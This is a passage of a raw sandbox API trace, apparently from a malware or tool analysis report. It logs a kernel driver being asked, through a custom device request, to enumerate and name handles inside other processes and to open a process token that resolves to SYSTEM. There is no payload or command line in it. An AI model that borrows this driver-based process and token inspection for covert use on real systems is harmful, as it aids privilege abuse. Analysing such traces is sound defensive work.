0x7e0b [0289.399] IoCompleteRequest () returned 0x0 [0289.399] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.399] PsAcquireProcessExitSynchronization () returned 0x0 [0289.399] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.399] ObReferenceObjectByHandle (in: Handle=0x128, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069585a40, HandleInformation=0x0) returned 0x0 [0289.400] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.400] PsReleaseProcessExitSynchronization () returned 0x2 [0289.400] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd1d [0289.400] ObQueryNameString (in: Object=0xffffe00069585a40, ObjectNameInfo=0xffffe0006a2ca044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a2ca044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.400] ObfDereferenceObject (Object=0xffffe00069585a40) returned 0x800d [0289.400] IoCompleteRequest () returned 0x0 [0289.400] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.400] PsAcquireProcessExitSynchronization () returned 0x0 [0289.400] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.400] ObReferenceObjectByHandle (in: Handle=0x170, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00067eae690, HandleInformation=0x0) returned 0x0 [0289.400] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.400] PsReleaseProcessExitSynchronization () returned 0x2 [0289.400] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd1c [0289.400] ObQueryNameString (in: Object=0xffffe00067e4f240, ObjectNameInfo=0xffffe0006a6fe7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6fe7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.400] ObfDereferenceObject (Object=0xffffe00067eae690) returned 0x7ffb [0289.400] IoCompleteRequest () returned 0x0 [0289.400] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.400] PsAcquireProcessExitSynchronization () returned 0x0 [0289.400] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.400] ObReferenceObjectByHandle (in: Handle=0x370, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000696b9940, HandleInformation=0x0) returned 0x0 [0289.400] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.400] PsReleaseProcessExitSynchronization () returned 0x2 [0289.400] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd1b [0289.400] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a6bc044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a6bc044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.400] ObfDereferenceObject (Object=0xffffe000696b9940) returned 0x7ffd [0289.400] IoCompleteRequest () returned 0x0 [0289.400] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.400] PsAcquireProcessExitSynchronization () returned 0x0 [0289.400] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.400] ObReferenceObjectByHandle (in: Handle=0x548, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000696ba590, HandleInformation=0x0) returned 0x0 [0289.400] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.400] PsReleaseProcessExitSynchronization () returned 0x2 [0289.400] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd1a [0289.400] ObQueryNameString (in: Object=0xffffe000756919d0, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.400] ObfDereferenceObject (Object=0xffffe000696ba590) returned 0x7fff [0289.400] IoCompleteRequest () returned 0x0 [0289.400] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.400] PsAcquireProcessExitSynchronization () returned 0x0 [0289.400] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.400] ObReferenceObjectByHandle (in: Handle=0x54c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000696ba420, HandleInformation=0x0) returned 0x0 [0289.400] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.400] PsReleaseProcessExitSynchronization () returned 0x2 [0289.400] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd19 [0289.400] ObQueryNameString (in: Object=0xffffe000696ba420, ObjectNameInfo=0xffffe000692bf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000692bf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.401] ObfDereferenceObject (Object=0xffffe000696ba420) returned 0x7fbe [0289.401] IoCompleteRequest () returned 0x0 [0289.401] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.401] PsAcquireProcessExitSynchronization () returned 0x0 [0289.401] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.401] ObReferenceObjectByHandle (in: Handle=0x550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000696ba2b0, HandleInformation=0x0) returned 0x0 [0289.401] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.401] PsReleaseProcessExitSynchronization () returned 0x2 [0289.401] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd18 [0289.401] ObQueryNameString (in: Object=0xffffe000696ba2b0, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.401] ObfDereferenceObject (Object=0xffffe000696ba2b0) returned 0x7fd3 [0289.401] IoCompleteRequest () returned 0x0 [0289.401] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.401] PsAcquireProcessExitSynchronization () returned 0x0 [0289.401] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.401] ObReferenceObjectByHandle (in: Handle=0x5f0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000696bb4e0, HandleInformation=0x0) returned 0x0 [0289.401] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.401] PsReleaseProcessExitSynchronization () returned 0x2 [0289.401] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd17 [0289.401] ObQueryNameString (in: Object=0xffffe000696bb4e0, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.401] ObfDereferenceObject (Object=0xffffe000696bb4e0) returned 0x7cb5 [0289.401] IoCompleteRequest () returned 0x0 [0289.401] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.401] PsAcquireProcessExitSynchronization () returned 0x0 [0289.401] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.401] ObReferenceObjectByHandle (in: Handle=0x5f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000696b64b0, HandleInformation=0x0) returned 0x0 [0289.401] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.401] PsReleaseProcessExitSynchronization () returned 0x2 [0289.401] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd16 [0289.401] ObQueryNameString (in: Object=0xffffe000696b64b0, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.401] ObfDereferenceObject (Object=0xffffe000696b64b0) returned 0x7ffe [0289.401] IoCompleteRequest () returned 0x0 [0289.401] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.401] PsAcquireProcessExitSynchronization () returned 0x0 [0289.401] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.401] ObReferenceObjectByHandle (in: Handle=0x748, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697f0330, HandleInformation=0x0) returned 0x0 [0289.401] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.401] PsReleaseProcessExitSynchronization () returned 0x2 [0289.401] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd15 [0289.401] ObQueryNameString (in: Object=0xffffe00068b6a060, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.401] ObfDereferenceObject (Object=0xffffe000697f0330) returned 0x7fe5 [0289.401] IoCompleteRequest () returned 0x0 [0289.401] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.402] PsAcquireProcessExitSynchronization () returned 0x0 [0289.402] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.402] ObReferenceObjectByHandle (in: Handle=0x834, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006996a970, HandleInformation=0x0) returned 0x0 [0289.402] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.402] PsReleaseProcessExitSynchronization () returned 0x2 [0289.402] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd14 [0289.402] ObQueryNameString (in: Object=0xffffe0006996a970, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.402] ObfDereferenceObject (Object=0xffffe0006996a970) returned 0x7ffe [0289.402] IoCompleteRequest () returned 0x0 [0289.402] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.402] PsAcquireProcessExitSynchronization () returned 0x0 [0289.402] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.402] ObReferenceObjectByHandle (in: Handle=0x8bc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a3eba0, HandleInformation=0x0) returned 0x0 [0289.402] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.402] PsReleaseProcessExitSynchronization () returned 0x2 [0289.402] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd13 [0289.402] ObQueryNameString (in: Object=0xffffe00069a3eba0, ObjectNameInfo=0xffffe00068423044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe00068423044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.402] ObfDereferenceObject (Object=0xffffe00069a3eba0) returned 0x7fd3 [0289.402] IoCompleteRequest () returned 0x0 [0289.592] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.592] PsAcquireProcessExitSynchronization () returned 0x0 [0289.592] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.592] ObReferenceObjectByHandle (in: Handle=0x8f4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069aac440, HandleInformation=0x0) returned 0x0 [0289.592] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.592] PsReleaseProcessExitSynchronization () returned 0x2 [0289.592] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd12 [0289.592] ObQueryNameString (in: Object=0xffffe00069aac440, ObjectNameInfo=0xffffe000692bf7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe000692bf7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.592] ObfDereferenceObject (Object=0xffffe00069aac440) returned 0x7ffd [0289.592] IoCompleteRequest () returned 0x0 [0289.592] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.592] PsAcquireProcessExitSynchronization () returned 0x0 [0289.592] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.592] ObReferenceObjectByHandle (in: Handle=0xae4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b7bd80, HandleInformation=0x0) returned 0x0 [0289.592] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.592] PsReleaseProcessExitSynchronization () returned 0x2 [0289.592] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd11 [0289.592] ObQueryNameString (in: Object=0xffffe00069b7bd80, ObjectNameInfo=0xffffe0006a610704, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a610704, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.592] ObfDereferenceObject (Object=0xffffe00069b7bd80) returned 0x800e [0289.592] IoCompleteRequest () returned 0x0 [0289.593] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.593] PsAcquireProcessExitSynchronization () returned 0x0 [0289.593] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.593] ObReferenceObjectByHandle (in: Handle=0xaf8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069b4edb0, HandleInformation=0x0) returned 0x0 [0289.593] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.593] PsReleaseProcessExitSynchronization () returned 0x2 [0289.593] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd10 [0289.593] ObQueryNameString (in: Object=0xffffe00069b4edb0, ObjectNameInfo=0xffffe0006a5bc7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a5bc7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.593] ObfDereferenceObject (Object=0xffffe00069b4edb0) returned 0x7ffe [0289.593] IoCompleteRequest () returned 0x0 [0289.593] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.593] PsAcquireProcessExitSynchronization () returned 0x0 [0289.593] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.593] ObReferenceObjectByHandle (in: Handle=0xb14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069e21330, HandleInformation=0x0) returned 0x0 [0289.593] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.593] PsReleaseProcessExitSynchronization () returned 0x2 [0289.593] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd0f [0289.593] ObQueryNameString (in: Object=0xffffe00069e21330, ObjectNameInfo=0xffffe0006904d7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006904d7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.593] ObfDereferenceObject (Object=0xffffe00069e21330) returned 0x7ff4 [0289.593] IoCompleteRequest () returned 0x0 [0289.593] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.593] PsAcquireProcessExitSynchronization () returned 0x0 [0289.593] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.593] ObReferenceObjectByHandle (in: Handle=0xc08, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069a8fc40, HandleInformation=0x0) returned 0x0 [0289.593] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.593] PsReleaseProcessExitSynchronization () returned 0x2 [0289.593] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd0e [0289.593] ObQueryNameString (in: Object=0xffffe00069a8fc40, ObjectNameInfo=0xffffe0006a4f07c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a4f07c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.593] ObfDereferenceObject (Object=0xffffe00069a8fc40) returned 0x7ffc [0289.593] IoCompleteRequest () returned 0x0 [0289.593] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.593] PsAcquireProcessExitSynchronization () returned 0x0 [0289.593] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.593] ObReferenceObjectByHandle (in: Handle=0xc14, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe00069bd1d10, HandleInformation=0x0) returned 0x0 [0289.593] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.593] PsReleaseProcessExitSynchronization () returned 0x2 [0289.593] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd0d [0289.593] ObQueryNameString (in: Object=0xffffe00069bd1d10, ObjectNameInfo=0xffffe0006a66b7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a66b7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.593] ObfDereferenceObject (Object=0xffffe00069bd1d10) returned 0x7ff4 [0289.593] IoCompleteRequest () returned 0x0 [0289.593] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.593] PsAcquireProcessExitSynchronization () returned 0x0 [0289.593] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.593] ObReferenceObjectByHandle (in: Handle=0xc18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a344bf0, HandleInformation=0x0) returned 0x0 [0289.594] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.594] PsReleaseProcessExitSynchronization () returned 0x2 [0289.594] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd0c [0289.594] ObQueryNameString (in: Object=0xffffe0006a344bf0, ObjectNameInfo=0xffffe0006a397044, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a397044, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.594] ObfDereferenceObject (Object=0xffffe0006a344bf0) returned 0x7ffd [0289.594] IoCompleteRequest () returned 0x0 [0289.594] PsLookupProcessByProcessId (in: ProcessId=0x1ec, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.594] PsAcquireProcessExitSynchronization () returned 0x0 [0289.594] KeStackAttachProcess (in: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe00067eca080, ApcState=0xffffd000ac0cf400) [0289.594] ObReferenceObjectByHandle (in: Handle=0xc1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe0006a343a60, HandleInformation=0x0) returned 0x0 [0289.594] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.594] PsReleaseProcessExitSynchronization () returned 0x2 [0289.594] ObfDereferenceObject (Object=0xffffe00067eca080) returned 0x5fd0b [0289.594] ObQueryNameString (in: Object=0xffffe0006a343a60, ObjectNameInfo=0xffffe0006a50a7c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a50a7c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.594] ObfDereferenceObject (Object=0xffffe0006a343a60) returned 0x7ffd [0289.594] IoCompleteRequest () returned 0x0 [0289.594] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x240) returned 0x188 [0289.594] DeviceIoControl (in: hDevice=0x14c, dwIoControlCode=0x8335000c, lpInBuffer=0x14d3d0*, nInBufferSize=0x8, lpOutBuffer=0x14d3d8, nOutBufferSize=0x8, lpBytesReturned=0x14d360, lpOverlapped=0x0 | out: lpInBuffer=0x14d3d0*, lpOutBuffer=0x14d3d8*, lpBytesReturned=0x14d360*=0x8, lpOverlapped=0x0) returned 1 [0289.594] ObReferenceObjectByHandle (in: Handle=0x188, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf498, HandleInformation=0x0 | out: Object=0xffffd000ac0cf498*=0xffffe000696a6840, HandleInformation=0x0) returned 0x0 [0289.594] ObOpenObjectByPointer (in: Object=0xffffe000696a6840, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xffffd000ac0cf4a0 | out: Handle=0xffffd000ac0cf4a0*=0xffffffff80000c60) returned 0x0 [0289.594] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x80175 [0289.594] ZwOpenProcessToken (in: ProcessHandle=0xffffffff80000c60, DesiredAccess=0x8, TokenHandle=0xffffe0006a3958c0 | out: TokenHandle=0xffffe0006a3958c0*=0x18c) returned 0x0 [0289.594] ZwClose (Handle=0xffffffff80000c60) returned 0x0 [0289.594] IoCompleteRequest () returned 0x0 [0289.594] GetTokenInformation (in: TokenHandle=0x18c, TokenInformationClass=0x1, TokenInformation=0x14d3f0, TokenInformationLength=0x800, ReturnLength=0x14d3c8 | out: TokenInformation=0x14d3f0, ReturnLength=0x14d3c8) returned 1 [0289.594] LookupAccountSidW (in: lpSystemName="", Sid=0x14d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), Name=0x14ecb0, cchName=0x14d3c0, ReferencedDomainName=0x14e690, cchReferencedDomainName=0x14e440, peUse=0x14d3e0 | out: Name="SYSTEM", cchName=0x14d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x14e440, peUse=0x14d3e0) returned 1 [0289.595] CloseHandle (hObject=0x18c) returned 1 [0289.595] CloseHandle (hObject=0x188) returned 1 [0289.595] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.595] PsAcquireProcessExitSynchronization () returned 0x0 [0289.595] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.595] ObReferenceObjectByHandle (in: Handle=0x18, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000696a5480, HandleInformation=0x0) returned 0x0 [0289.595] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.595] PsReleaseProcessExitSynchronization () returned 0x2 [0289.595] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78173 [0289.595] ObQueryNameString (in: Object=0xffffe00069086c90, ObjectNameInfo=0xffffe0006a4f5044, Length=0x800, ReturnLength=0xffffd000ac0cf338 | out: ObjectNameInfo=0xffffe0006a4f5044, ReturnLength=0xffffd000ac0cf338) returned 0x0 [0289.595] ObfDereferenceObject (Object=0xffffe000696a5480) returned 0x7ffd [0289.595] IoCompleteRequest () returned 0x0 [0289.595] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.595] PsAcquireProcessExitSynchronization () returned 0x0 [0289.595] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.595] ObReferenceObjectByHandle (in: Handle=0xbc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xffffd000ac0cf378, HandleInformation=0x0 | out: Object=0xffffd000ac0cf378*=0xffffe000697ac830, HandleInformation=0x0) returned 0x0 [0289.595] KeUnstackDetachProcess (ApcState=0xffffd000ac0cf400) [0289.595] PsReleaseProcessExitSynchronization () returned 0x2 [0289.595] ObfDereferenceObject (Object=0xffffe000696a6840) returned 0x78172 [0289.595] ObQueryNameString (in: Object=0xffffe000697ac830, ObjectNameInfo=0xffffe0006a3e57c4, Length=0x800, ReturnLength=0xffffd000ac0cf380 | out: ObjectNameInfo=0xffffe0006a3e57c4, ReturnLength=0xffffd000ac0cf380) returned 0x0 [0289.596] ObfDereferenceObject (Object=0xffffe000697ac830) returned 0x7f59 [0289.596] IoCompleteRequest () returned 0x0 [0289.596] PsLookupProcessByProcessId (in: ProcessId=0x240, Process=0xffffd000ac0cf388 | out: Process=0xffffd000ac0cf388) returned 0x0 [0289.596] PsAcquireProcessExitSynchronization () returned 0x0 [0289.596] KeStackAttachProcess (in: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400 | out: PROCESS=0xffffe000696a6840, ApcState=0xffffd000ac0cf400) [0289.596] ObReferenceObjectByHandle (in: Handle=0x130, 